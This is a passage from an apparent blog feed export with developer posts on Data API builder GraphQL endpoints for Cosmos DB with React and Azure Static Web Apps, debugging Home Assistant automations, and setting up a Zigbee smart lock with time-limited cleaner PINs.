to run npx graphql-codegen instead.\nWith the error sorted, let’s continue with the hook. Initially we’ve defined the GraphQL query in the getQuestionsDocument variable, and then we’ve used the graphql function create a TypedDocumentNode which is the type that Apollo Client expects. 
Next, we’ll use the useQuery hook to execute the query, and then we’ll return the data from the query:\n1 2 3 export const useQuestions = () => { const { data, loading } = useQuery(getQuestionsDocument); }; Admittedly, we could just return the data.questions.items from the hook, but I don’t want to do that because the data structure contains two fields I’d prefer to merge, correct_answer and incorrect_answers, so that we can shuffle the answers in a random way and then have the application only know about all the answers as a single array. To do this, we’ll use the useEffect hook to merge the data, and then we’ll return the merged data:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 export type QuestionModel = Omit< GetQuestionsQuery["questions"]["items"][0], "incorrect_answers" > & { answers: string[]; }; export const useQuestions = () => { const { data, loading } = useQuery(getQuestionsDocument); const [questions, setQuestions] = useState<QuestionModel[] | undefined>( undefined ); useEffect(() => { if (data) { setQuestions( data?.questions.items.map((question) => ({ id: question.id, question: question.question, correct_answer: question.correct_answer, answers: arrayRandomizer( question.incorrect_answers.concat(question.correct_answer) ), })) ); } }, [data]); return { questions, loading }; }; Since the questions that we return will have some of the same fields as the object returned from the original GraphQL query, we may as well use the Omit type to remove the incorrect_answers field from the QuestionModel type. We can then add the answers field to the type, which is an array of strings that contains the correct_answer and the incorrect_answers shuffled in a random order.\nNow all that’s left is to add the Apollo Client provider to our React application:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 import { ApolloClient, ApolloProvider, InMemoryCache } from "@apollo/client"; import React from "react"; import ReactDOM from "react-dom/client"; import App from "./App"; import "./index.css"; const client = new ApolloClient({ uri: `/data-api/graphql/`, cache: new InMemoryCache(), }); ReactDOM.createRoot(document.getElementById("root") as HTMLElement).render( <React.StrictMode> <ApolloProvider client={client}> <App /> </ApolloProvider> </React.StrictMode> ); And then use the hook in the App component (I’ll omit that for brevity, you can check it out in the GitHub repo). But with it all configured, here’s how it looks:\nConclusion In this post we’ve taken a look at how we can use the new Database Connections feature of Azure Static Web Apps to connect to a Cosmos DB database and expose it as a GraphQL endpoint, without having to write the server ourself. 
We’ve also seen that this can be done entirely via the local emulator for SWA, allowing us to rapidly iterate over the application without having to deploy it each time.\nWhile we didn’t go through the deployment aspect in this post specifically, you can learn how to do that through our docs.\n", "id": "2023-03-16-graphql-on-azure-part-13-using-dab-with-swa-and-react" }, { "title": "GraphQL on Azure: Part 12 - GraphQL as a Service", "url": "https://www.aaron-powell.com/posts/2023-03-16-graphql-on-azure-part-12-graphql-as-a-service/", "date": "Wed, 15 Mar 2023 16:00:47 +0000", "tags": [ "azure", "graphql", "javascript", "dotnet" ], "description": "It's never been easier to create a GraphQL server on Azure, let's check out what's new", "content": "\nI’m really excited because today we launched the first public preview of Data API builder for Azure Databases or DAB for short (the official name is a bit of a mouthful 😅).\nThe important links you’ll need are:\nSQL announcement Cosmos announcement Docs SWA integration announcement GitHub Repo What is DAB DAB is a joint effort from the Azure SQL, PostgreSQL, MySQL and Cosmos DB teams to provide a simple and easy way to create REST and GraphQL endpoints from your existing database. Now obviously this is something that you’ve always been able to do, but the difference is that DAB does it for you (after all, that’s the point of this series 😜) so rather than having to write an ASP.NET application, data layer, authentication and authorisation, and so on, DAB will do all of that for you. Essentially, DAB is a Backend as a Service (BaaS) and this makes it easier to create an application over a database by removing the need to create the backend yourself.\nQuick note: DAB doesn’t support REST for Cosmos DB as Cosmos DB already has a REST API.\nHow does DAB work DAB is going to need a data schema that describes the entities you want to expose. In the case of a SQL backend, DAB will inspect the database schema and allow you to expose the tables, views and stored procedures as endpoints. With a NoSQL backend (currently Cosmos DB NoSQL) you need to provide a set of GraphQL types which define the entities you want expose, since there’s no database schema to work from.\nYou’ll also provide DAB with a config file which acts as a mapping between the data schema and how you want those entities exposed. In the config file you’ll define entities you want to expose (so you can pick and choose what you want to expose from the available schema), access control and entity relationships. If you’re working with a SQL database and have views or stored procedures, you can define how they will be exposed.\nWith this information DAB will then generate the appropriate REST endpoints for each entity with REST semantics on how CRUD should work, as well as a full GraphQL schema, including queries for individual items, paginated lists (with filtering) and mutations (create, update and delete).\nYour first DAB instance Sounds cool doesn’t it? Well, let’s go ahead and make a DAB server. The first thing we’ll need to do is install the DAB CLI:\n1 dotnet tool install --global Microsoft.DataApiBuilder The CLI is used to help us generate our config file, but also to run a local version of DAB. 
I’m going to use DAB with a Cosmos DB backend, just to show you how to go about creating a data schema for Cosmos, so you’ll either need a local emulator or deployed Cosmos DB instance (I like to use the cross-platform emulator in a devcontainer).\nLet’s start by initialising the config file:\n1 dab init --config dab-config.json --database-type cosmosdb_nosql --connection-string "..." --host-mode Development --cors-origin "http://localhost:3000" --cosmosdb_nosql-database trivia --graphql-schema schema.graphql This will generate you a config file like so:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 { "$schema": "https://dataapibuilder.azureedge.net/schemas/v0.5.34/dab.draft.schema.json", "data-source": { "database-type": "cosmosdb_nosql", "options": { "database": "Trivia", "schema": "schema.graphql" }, "connection-string": "..." }, "runtime": { "graphql": { "allow-introspection": true, "enabled": true, "path": "/graphql" }, "host": { "mode": "development", "cors": { "origins": ["http://localhost:3000"], "allow-credentials": false }, "authentication": { "provider": "StaticWebApps" } } }, "entities": {} } Since this is Cosmos DB and we don’t have a database schema we can work with, we’re going to need to create some types in GraphQL for DAB to use:\n1 2 3 4 5 6 type Question @model { id: String! question: String! correct_answer: String! incorrect_answers: [String!]! } This looks pretty standard as far as a GraphQL type is concerned, with the exception of a @model directive that’s been applied to the type. This directive is required to tell DAB that this is a type that we want to generate a full schema for (queries and mutations), and not a type that is a child of another type (in the case of a nested JavaScript object).\nWith our schema defined, we have to tell DAB how to retrieve documents from Cosmos that match that type, and that’s what the entities field in the config file is for. Let’s use the CLI to define a new entity:\n1 dab add Question --source questions --permissions "anonymous:*" This command is defining a new entity called Question, specifying that the collection (source) in Cosmos DB is questions and that we want to allow anonymous access to all operations on this entity. I’m being pretty lazy on the security, but if you want to do it properly you can define different roles and the access they have (create, read, update or delete) to the entity.\nWith this added our config file now looks like this:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 { "$schema": "https://dataapibuilder.azureedge.net/schemas/v0.5.34/dab.draft.schema.json", "data-source": { "database-type": "cosmosdb_nosql", "options": { "database": "Trivia", "schema": "schema.graphql" }, "connection-string": "..." 
}, "runtime": { "graphql": { "allow-introspection": true, "enabled": true, "path": "/graphql" }, "host": { "mode": "development", "cors": { "origins": ["http://localhost:3000"], "allow-credentials": false }, "authentication": { "provider": "StaticWebApps" } } }, "entities": { "Question": { "source": "questions", "permissions": [ { "role": "*", "actions": ["*"] } ] } } } With the config file complete we can now the server:\n1 dab start Now we can load up the GraphQL endpoint, https://localhost:5001/graphql, in your preferred GraphQL IDE (I like to use Banana Cake Pop):\nYou’ll then see the whole GraphQL schema that was generated from the config file and GraphQL types provided:\nIt’s really cool, we have queries just magically generated for us!\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 type Query { """ Get a list of all the Question items from the database """ questions( """ The number of items to return from the page start point """ first: Int """ A pagination token from a previous query to continue through a paginated list """ after: String """ Filter options for query """ filter: QuestionFilterInput """ Ordering options for query """ orderBy: QuestionOrderByInput ): QuestionConnection! """ Get a Question from the database by its ID/primary key """ question_by_pk(id: ID, _partitionKeyValue: String): Question } This means we could write a query like this:\n1 2 3 4 5 6 7 8 9 10 query { questions { items { id question correct_answer incorrect_answers } } } And when executed it’ll return all the documents:\nYou can even write complex filter queries that take a subset of the results:\n1 2 3 4 5 6 7 8 9 10 11 12 query { questions(filter: { question: { contains: "What" } }, first: 10) { endCursor hasNextPage items { id question correct_answer incorrect_answers } } } Which will then give us an output such as:\n1 2 3 4 5 6 7 8 9 { "data": { "questions": { "endCursor": "W3sidG9rZW4iOiIrUklEOn41anNMQU83WXk4TVhBQUFBQUFBQUFBPT0jUlQ6MSNUUkM6MTAjSVNWOjIjSUVPOjY1NTUxI1FDRjo4I0ZQQzpBZ0VBQUFBT0FCWUFnS0lBb05pUk5nUUxJQXdBIiwicmFuZ2UiOnsibWluIjoiIiwibWF4IjoiRkYifX1d", "hasNextPage": true, "items": [ ... ] } } } The endCursor is a token that can be used to get the next page of results, using the after input field, and the hasNextPage flag tells us if there are any more pages to get.\nConclusion In this post we’ve looked at how to use GraphQL as a service on Azure, using the Data API builder project. It’s a really cool project that allows you to quickly get up and running with a GraphQL API (or REST if that’s your preference, but this series is GraphQL on Azure, not REST on Azure 😝).\nWith a few commands we can scaffold up DAB, define what the data schema we want to export looks like, connect to an existing database and then start serving up data.\nGo check out the official announcement, and the GitHub repo, the docs and the samples and give it a try!\n", "id": "2023-03-16-graphql-on-azure-part-12-graphql-as-a-service" }, { "title": "Building a Smart Home - Part 10 Debugging!", "url": "https://www.aaron-powell.com/posts/2023-03-01-building-a-smart-home---part-10-debugging/", "date": "Wed, 01 Mar 2023 07:20:28 +0000", "tags": [ "HomeAssistant", "smart-home" ], "description": "You know what's fun? Having to debug your own home...", "content": "When you get down to it, a smart home is partially a software solution, and like any good software solution there are bugs. 
I’ve recently been spending some time “debugging” my home, and I thought I’d share some of the things I’ve learned.\nCase sensitivity For home security, I have an automation that runs every night when my phone goes on the wireless charger to close the garage door and gate. This is to ensure that if I forget to close them, they will be closed before I go to bed. Here’s part of that automation:\n1 2 3 4 5 6 7 8 9 10 11 12 13 alias: "Security: End of day" description: "" trigger: - platform: state entity_id: - sensor.aaron_s_phone_charger_type to: wireless condition: - condition: time after: "21:00:00" - condition: state entity_id: group.persons state: Home I didn’t think much of it, I just assumed the automation was working, but one day I noticed that the automation hadn’t run any of the actions. That’s weird, it says it ran, so I had a look at the traces for the automation and I found that it bailed out on the condition.\nThe group.persons entity is defined as so:\n1 2 3 4 5 6 group: persons: name: All People entities: - person.aaron - person.mel And I knew that we were both home, but looking back through the history it turned out the automation had never run. Ok, we’ve got a bug to fix. Having a look at the trace log for the automation, I noticed this when it hit the condition:\nResult: result: true state: home wanted_state: Home sigh I had a typo in the automation, I had Home instead of home. I fixed the typo and the automation started working as expected… well, it actually uncovered another bug.\nWhy is the gate open A few posts ago I wrote about controlling out motorised gate and it’s basically the same approach we have for the garage door (the motor operates in a very similar manner).\nLet’s go back to the automation from the last section, and look at the actions:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 alias: "Security: End of day" description: "" trigger: - platform: state entity_id: - sensor.aaron_s_phone_charger_type to: wireless condition: - condition: time after: "21:00:00" - condition: state entity_id: group.persons state: home action: - service: cover.close_cover data: {} target: entity_id: - cover.garage_door - cover.roller_gate - service: lock.lock data: {} target: entity_id: lock.0x000d6f0010c98b1e mode: single It does two things, calls cover.close_cover to close the garage and gate, and lock.lock to lock the front door. I can see in the trace that they run as expected, and thankfully the front door was locked, but why are the gate and garage door open?\nWell, it turns out that the cover entities I had for both had a bug in them. I had defined them as so:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 - platform: template covers: garage_door: device_class: garage friendly_name: "Garage Door" value_template: >- {% if is_state('binary_sensor.garage_door_contact','on') %} Open {% else %} Closed {% endif %} open_cover: - service: switch.turn_on data: entity_id: switch.garage_door close_cover: - service: switch.turn_on data: entity_id: switch.garage_door stop_cover: service: switch.turn_on data: entity_id: switch.garage_door icon_template: >- {% if is_state('binary_sensor.garage_door_contact','on') %} mdi:garage-open {% else %} mdi:garage {% endif %} Can you see the problem? The close_cover (and open_cover for that matter) are defined to call switch.turn_on which triggers the Shelly to turn on and start the motor. 
The problem is, it will do this without first checking should it do it, the service doesn’t know the state of the garage or gate, that’s provided by a binary_sensor (from an Aqara contact sensor) and is only visually represented by the value_template and icon_template.\nTo fix this I had to change the close_cover (and open_cover) to have a condition that checks the door state first:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 - platform: template covers: garage_door: device_class: garage friendly_name: "Garage Door" value_template: >- {% if is_state('binary_sensor.garage_door_contact','on') %} Open {% else %} Closed {% endif %} open_cover: - condition: state entity_id: binary_sensor.garage_door_contact state: "off" - service: switch.turn_on data: entity_id: switch.garage_door close_cover: - condition: state entity_id: binary_sensor.garage_door_contact state: "on" - service: switch.turn_on data: entity_id: switch.garage_door stop_cover: service: switch.turn_on data: entity_id: switch.garage_door icon_template: >- {% if is_state('binary_sensor.garage_door_contact','on') %} mdi:garage-open {% else %} mdi:garage {% endif %} Now if the sensor returns “off”, which means the door is open, it can call switch.turn_on and close the garage, but if it’s “on” (the door is closed) it won’t call switch.turn_on and the garage door won’t move.\nNo more waking up to the garage door open!\nWhy did that light turn on I’ve talked at length about how I control our fans and to make them better I added some Shelly’s so now the ceiling fans pretty much don’t get turned off, from a power standpoint, we just send the right RF signals.\nWell, the other day at 1am my wife and I were rudely woken up to the light in our bedroom being on at fully brightness. Queue me fumbling around to grab my phone, open the HA app, finding it not responding for some reason and having to get out of bed to turn the light off (and wait the 10s for it to turn off - thanks to an automation).\nThis wasn’t the first time I’d noticed the fan light in our room turning on at random times and only the second time that it’d done it in the middle of the night to wake us up, so it was time to figure out what was going on.\nWhen I was awake in the morning I went to the HA logs and found that the light was turned on by this automation:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 alias: "Lighting: Toggle parents light on switch change" description: "" trigger: - platform: state entity_id: - binary_sensor.parents_bedroom_channel_1_input - binary_sensor.parents_bedroom_channel_2_input condition: [] action: - if: - conditions: - condition: template value_template: "{{ is_state(light, 'on') }}" alias: Light on then: - if: - condition: time after: "21:00:00" then: - delay: hours: 0 minutes: 0 seconds: 10 milliseconds: 0 - service: light.turn_off target: entity_id: "{{ light }}" else: - service: light.turn_on target: entity_id: "{{ light }}" mode: single variables: light: >- {{ 'light.parents_fan' if trigger.entity_id == 'binary_sensor.parents_bedroom_channel_1_input' else 'light.parents_downlights' }} In this case I’m using the Shelly’s in Detached Switch mode and relying on the automation to turn them on or off as required. 
The mistake I made here is with the triggers we’re using, or more accurately, with an assumption about the states the switch can be in when it triggers the automation.\nI incorrectly assumed that the state of the switch would be on or off, but it turns out there is at least one other state, unavailable. This state happens if the Shelly reboots, loses power or the network connection is lost. In this case the automation is triggered and the light is turned on.\nNow Shelly’s are pretty stable devices, but the reason that I hit it this particular time is that we’d had a restart in our UDM from an update, so the network dropped briefly, the Shelly went to unavailable and then the automation triggered and turned the light on.\nTo fix this, I made the triggers a lot more specific, I really only care if it goes from on to off, or vice versa, so I changed the automation triggers to:\n1 2 3 4 5 6 7 8 9 10 11 12 13 trigger: - platform: state entity_id: - binary_sensor.parents_bedroom_channel_1_input - binary_sensor.parents_bedroom_channel_2_input to: "on" from: "off" - platform: state entity_id: - binary_sensor.parents_bedroom_channel_1_input - binary_sensor.parents_bedroom_channel_2_input to: "off" from: "on" I also decided to use a choose action rather than an if and only handle the on and off case.\nThe light now works as expected and we haven’t had the light randomly turning on in the middle of the night any more.\nWhy won’t the light turn off From one light problem to another, and again the culprit is the fan lights, but this time in our kids bedrooms. The kids have two lights in their room, the fan light and a wifi LED bulb in their lamp that can do a bunch of colours and effects, the main one we use being a nightlight effect. For their fan lights I have an automation that turns the light on or off, unless it’s after bed time, then instead of turning it off, it’ll turn the lamp to Night Light, which in turn turns the fan light off.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 alias: "Lighting: Kids fan light switch toggle" description: "" trigger: - platform: state entity_id: - binary_sensor.kid1_room_input - binary_sensor.kid2_room_input condition: [] action: - if: - condition: template value_template: "{{ is_state(light, 'on') }}" then: - if: - condition: time after: "18:45:00" then: - service: light.turn_on data: effect: Night light target: entity_id: "{{ lamp }}" else: - service: light.turn_off target: entity_id: "{{ light }}" else: - service: light.turn_on target: entity_id: "{{ light }}" mode: single variables: light: >- {{ 'light.kid1_fan' if trigger.entity_id == 'binary_sensor.kid1_room_input' else 'light.kid2_fan' }} lamp: >- {{ 'light.kid1_lamp' if trigger.entity_id == 'binary_sensor.kid1_room_input' else 'light.kid2_lamp' }} It might seem like we have an overly complex set of automations, like the fact that we don’t always control the light from the switch, but using the nightlight like this works great as we can set the scene of the bedroom in one set of commands and it’s controllable from HA and the Google Home, so the kids can control it themselves.\nBut there’s a problem - what happens if it’s after 6.45pm and the lamp is already in Night Light mode? Well, the switch will set the effect but it doesn’t change anything, which means it doesn’t trigger the next automation in the chain, so the light stays on and there’s no way to turn it off (short of using the HA app). 
Yeah, this wasn’t a great experience when I was helping our youngest change his PJs in the middle of the night after an accident, having to then fumble around turning the lamp off and back on to get it off the effect to then turn the fan light off.\nAgain, this was a relatively easy fix, I added an additional condition to check if the lamp already had the effect set to Night Light and if it did, don’t set it again, just go to the turn off light step.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 alias: "Lighting: Kids fan light switch toggle" description: "" trigger: - platform: state entity_id: - binary_sensor.angus_s_room_input - binary_sensor.reuben_s_room_input condition: [] action: - if: - condition: template value_template: "{{ is_state(light, 'on') }}" then: - if: - condition: time after: "18:45:00" - condition: template value_template: >- {{ not is_state(lamp, 'unavailable') and not is_state(lamp, 'on') }} then: - service: light.turn_on data: effect: Night light target: entity_id: "{{ lamp }}" else: - service: light.turn_off target: entity_id: "{{ light }}" else: - service: light.turn_on target: entity_id: "{{ light }}" mode: single variables: light: >- {{ 'light.angus_fan' if trigger.entity_id == 'binary_sensor.angus_s_room_input' else 'light.reuben_fan' }} lamp: >- {{ 'light.anguss_lamp' if trigger.entity_id == 'binary_sensor.angus_s_room_input' else 'light.wiz_rgbw_tunable_355b12' }} (I also check if the lamp isn’t unavailable as one of the bulbs tends to go offline randomly and can only be fixed by a power cycle… not ideal in the middle of the night).\nWrapping up Ah debugging, who’d have thought I’d have to do that for my own house, but here we are!\nThe problems that I’ve looked at here are really easy mistakes to make as a beginner with Home Assistant.\nIf you’re using state-based conditions, ensure that you verify the case of the states that you’re testing against, especially if they are states generated by non-standard entities. Diving into the traces of the automations can be a great way to see what’s going on and why things aren’t working as expected.\nAlso, be aware of the states beyond the ones that you actually care about. Because I wasn’t taking into consideration the unavailable state, I was getting unexpected results - the lights were turning on. Having additional conditions to exclude the states that you don’t care about can help to avoid these issues.\nLastly, when using templated entities, ensure that you know where the state is maintained. Because the state of my cover entities is separate from the entity itself - we’re using a template to display the right label/icon - they didn’t actually know not to trigger the switch that opens/closes the garage/gate. But it’s an easy fix with conditions on the service calls.\nWith these fixes sorted out everyone is a lot happier. 
Sure, there’ll be more bugs to come, but knowing these things that can catch me out will help me to avoid them in the future.\n", "id": "2023-03-01-building-a-smart-home---part-10-debugging" }, { "title": "Building a Smart Home - Part 9 Door Locks", "url": "https://www.aaron-powell.com/posts/2023-02-13-building-a-smart-home---part-9-door-locks/", "date": "Mon, 13 Feb 2023 02:50:43 +0000", "tags": [ "HomeAssistant", "smart-home" ], "description": "Because a physical key is so old school", "content": "I really like the idea of having a smart door lock on our front door, something about the peace of mind that I can know if the door is locked or not, control access and all those things, so getting a “smart” lock was something I started researching long before we moved into our new house (even before we had doors installed! 🤣).\nI’m going to refer to the locks as “smart” in quotes as generally speaking the locks themselves aren’t smart, it’s the systems around them that you build that are. Calling it a “connected lock” is probably more accurate, but semantics.\nRequirements While there are a lot of options on the market it was important for me to get the right one, and everyone has opinions on what constitutes right, so here are the things that I looked at (initially - I changed some stances over time and I’ll explain why later):\nIt integrates with our existing deadbolt It still has key access We can control who has access It’s not cloud enabled It integrates with Home Assistant I can control it from my phone It will report state I don’t feel like I’m entering an office building Exploring Options I started doing some research and a few of the early contenders were the Danalock v3 and the August Smart Lock. These both satisfied a lot of the criteria, they retrofit to an existing deadbolt by replacing the back, meaning that the front is still a standard lock (so keys can be used), they integrate into Home Assistant (through an additional hub admittedly but still) and they can be controlled via a phone. But their biggest win was that they didn’t change the look of your door, there was no visibility that you had a “smart” lock installed, which seemed like a good idea for reducing potential attack vectors.\nAnother even more enticing option is the Level Bolt, as it is completely hidden inside the doorframe, which seems really neat! But it looks like it’s mostly designed for the Apple ecosystem, which I’m not invested in, so I dropped it (it might be exposed via HomeKit to Home Assistant, but it’d still require more hoops than I’d like).\nSo there’s a variety of options out there; let’s start thinking about the usability of them.\nManaging Access Now that I had some product options in mind, it was time to start thinking about just how we’d use the lock. The primary users of the house are myself and my wife (the kids don’t need to be able to let themselves in yet, they’re a bit young for that still), but then we have secondary users, such as our cleaner, our parents, and when we’re away either a house sitter or friend who will look after the pets, and now the usability is becoming more complex.\nThinking of the model that the Danalock or August represent - an app-centric approach - we’d either have to “onboard” a lot of people of varying technical skills or keep handing out keys. Fundamentally, we want to reduce the number of keys in circulation, that’s part of the point of having keyless access, but this was not really going to solve it. 
And this was the main point I needed to overcome in what I wanted out of a “smart” lock.\nExploring Options… Again I was initially very much against the idea of having an NFC fob, digital PIN or similar for the door, to me this seemed like it would be very… office-y, and it was a home, not an office (which yes, both my wife and I work from home, so it is an office… BUT THAT’S BESIDE THE POINT! 😝).\nIt turns out that all three options above had digital PIN pads that you can get as add-ons, but now it’s starting to look expensive and complex, a lock, a bridge and a PIN pad, so I went looking at integrated options.\nI ended up coming across the Yale Assure Keyed lock as I knew a few people who recommended them, I think it looks fairly slick, and most of all, it’s 100% offline - no cloud connectivity, everything is managed on the device, from the PINs generated, the profiles, the time those PINs are valid for, etc. Yale is also a reasonably well known brand within the lock space, so it was reassuring that it wasn’t likely a company that could vanish and leave me with an unusable product (interesting aside, August is actually a sub-brand of Yale).\nBut because I wanted it integrated with Home Assistant, I picked up a ZigBee network module and organised for our locksmith to come out (you can install it yourself, but we have a family friend who’s a locksmith and they were going to upgrade all our locks from the ones the builder installed as he said they were all woefully bad 😅):\nCall a locksmith! pic.twitter.com/kaRJi16Tm5\n— Aaron Powell (@slace) August 29, 2022 Integrating with Home Assistant Since I’m using the ZigBee network module, integration with HA was reasonably trivial, I installed the module, put it into pairing mode and it joined my network:\nThere’s a heap of stuff that is exposed via the integration from the lock:\nThe control at the top is what you’d expect, an option to lock or unlock the lock, depending on its current state. The sensors are used to indicate that the lock is doing something, for example, when someone uses the PIN pad to unlock it will:\nSet the Action to unlock Set the Action source name to keypad Set the Action user to the user ID that the PIN is associated with These sensors are all then set to None immediately, so the value isn’t stored, but you could have an automation that triggers based on the (brief) state change.\nI’m yet to play with the Configuration section, and Diagnostics is, well, just that - I only care about the battery level.\nAutomations With the lock set up in HA we can now do automations with it and the first one I did was tackle a problem we had - forgetting to lock the door at night.\nAuto-locking with NodeRED For this one, I decided to experiment and use NodeRED, which is a visual workflow tool that can be used with HA (my friend Lars has a video on getting started if you want to check it out, but as an aside, I don’t really use NodeRED anymore, I find standard HA automations do the trick).\nThe way this automation works is that one of three events can trigger it, the time hits 9pm, it’s manually invoked, or my phone goes on the wireless charger (which we only have one of and it’s on our bedhead). 
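If I were building it as a standard HA automation today, the trigger side would look roughly like this (a sketch only - the entity name is illustrative, and the "manually invoked" case doesn't need a trigger since you can always run an automation by hand):

trigger:
  # 9pm each night
  - platform: time
    at: "21:00:00"
  # phone goes on the wireless charger on the bedhead
  - platform: state
    entity_id: sensor.aaron_s_phone_charger_type
    to: wireless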
When triggered, we read the state of the lock, which returns locked or unlocked and using a switch node we check for unlocked and if it is, it’ll call the service in HA to lock the lock and send a notification to my phone to tell me I forgot to lock the front door.\nAdvanced Automations That automation is pretty simple, but let’s try something a bit more advanced. I was talking to my friend Tatham, who also has the Yale Assure lock, and he was telling me about some of the stuff he did with his, like issuing PINs and setting time windows. This made me think of an innovative way to handle our cleaners access. Our cleaner comes once a fortnight so we issued them a PIN to access the house, but I really don’t need that PIN to be active outside of the day they come, so, let’s set it up as a time-based PIN.\nI started off by creating a boolean helper called cleaner_day, which we use to visually indicate that the cleaner is coming on our HA dashboard. I then adapted a pattern that Tatham had and defined three more helpers, a text helper for the PIN, a text helper for the user ID on the lock and a select helper to indicate the status of the PIN:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 input_text: lock_cleaner_pin: name: "Lock: Cleaner PIN" icon: mdi:lock-smart pattern: "[0-9]{0,8}" lock_cleaner_id: name: "Lock: Cleaner User ID" initial: "20" icon: mdi:information-variant input_select: lock_cleaner_status: name: "Lock: Cleaner PIN Provisioning Status" icon: mdi:lock-smart options: - Disabled - Pending - Registered - Failed I created two automations that will enable/disable cleaner day:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 - id: "1661944479647" alias: "Cleaner: Enable Cleaner Day" description: "" trigger: - platform: time at: 05:00:00 condition: - condition: time weekday: - wed - condition: template value_template: "{{(as_timestamp(now())|timestamp_custom ('%U') | int % 2) == 0 }}" action: - service: input_boolean.turn_on data: {} target: entity_id: input_boolean.cleaner_day - id: "1661944938684" alias: "Cleaner: Disable Cleaner Day" description: "" trigger: - platform: time at: "23:00:00" condition: - condition: time weekday: - wed - condition: state entity_id: input_boolean.cleaner_day state: "on" action: - service: input_boolean.turn_off data: {} target: entity_id: input_boolean.cleaner_day mode: single Both automations run on Wednesday (the day they come) but the “enable” only runs on every second one. 
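The "every second one" part is handled by that week-number template in the condition - %U is the week of the year, so the automation only proceeds on even-numbered weeks. Roughly, it evaluates like this (the example weeks are just for illustration):

{# e.g. a Wednesday in week 02 -> 2 % 2 == 0 -> condition passes, cleaner day turns on #}
{# e.g. a Wednesday in week 03 -> 3 % 2 == 1 -> condition fails, nothing happens #}
{{ (as_timestamp(now()) | timestamp_custom('%U') | int % 2) == 0 }}

(One thing to keep an eye on is that the week number resets each January, so the even/odd pattern can shift over a new year.)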
I could probably improve the enabling Cleaner Day using some of the new features around events, but this works.\nNow that HA knows that it’s the day the cleaner is coming, we can have another automation run to enable their PIN.\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 alias: "Security: Cleaner PIN Enable/Disable" mode: queued trigger: - platform: state entity_id: - input_boolean.cleaner_day action: - variables: user_id: "{{ states('input_text.lock_cleaner_id') | int }}" user_enabled: "{{ is_state('input_boolean.cleaner_day', 'on') }}" user_pin: "{{ states('input_text.lock_cleaner_pin') }}" - service: input_select.select_option target: entity_id: input_select.lock_cleaner_status data: option: Pending - service: mqtt.publish data: topic: zigbee2mqtt/<friendly name>/set payload_template: | {{ { "pin_code": { "user": user_id, "user_type": "unrestricted", "user_enabled": user_enabled, "pin_code": user_pin if user_enabled else None } } | to_json }} - wait_for_trigger: - id: active_confirmation platform: mqtt topic: zigbee2mqtt/<friendly name>/action payload: "{{ 'pin_code_added' if user_enabled else 'pin_code_deleted' }}" timeout: minutes: 1 - choose: - conditions: "{{ wait.trigger.id == 'active_confirmation' }}" sequence: - service: input_select.select_option target: entity_id: input_select.lock_cleaner_status data: option: "{{ 'Registered' if user_enabled else 'Disabled' }}" default: - service: input_select.select_option target: entity_id: input_select.lock_cleaner_status data: option: Failed Now the first thing you might wonder is why this is a separate automation and not bundled into the other ones. Well the primary reason is so that if we had an additional day that we book the cleaner for, we can manually change the cleaner_day helper and this automation will run.\nThis automation is somewhat complex, so let’s break it down. First, we’re going to use some variables for the important data, rather than constantly using the entity IDs:\n1 2 3 4 - variables: user_id: "{{ states('input_text.lock_cleaner_id') | int }}" user_enabled: "{{ is_state('input_boolean.cleaner_day', 'on') }}" user_pin: "{{ states('input_text.lock_cleaner_pin') }}" We’ll then report that we’re provisioning PIN access for the cleaner:\n1 2 3 4 5 - service: input_select.select_option target: entity_id: input_select.lock_cleaner_status data: option: Pending This is mostly for some debugging workflows, but I do find it somewhat useful to know this. Now we’re going to have to instruct the lock that we’re changing a PIN. Since I’m using ZigBee2MQTT we can fire MQTT messages to the lock, and one of those is updating the PIN by providing a JSON payload:\n1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 - service: mqtt.publish data: topic: zigbee2mqtt/<friendly name>/set payload_template: | {{ { "pin_code": { "user": user_id, "user_type": "unrestricted", "user_enabled": user_enabled, "pin_code": user_pin if user_enabled else None } } | to_json }} We grab the variables defined earlier and add that to some hardcoded stuff. The user_type is set to unrestricted, as this field is used to create schedules on the lock itself, but we manage that in HA so unrestricted is fine as it basically says “this user is known and allowed, let them in”. For the pin_code field, we either set it to their PIN, or set it to “null” (via None) if they are having access disabled. 
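To make that payload_template a bit more concrete, on a cleaner day it renders out to a message along these lines (the PIN here is made up; 20 is just the user ID from the helper above):

{
  "pin_code": {
    "user": 20,
    "user_type": "unrestricted",
    "user_enabled": true,
    "pin_code": "13579"
  }
}

And when cleaner day turns off, user_enabled becomes false and pin_code renders as null, which is what prompts the lock to remove the code (and gives us the pin_code_deleted confirmation we wait on).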
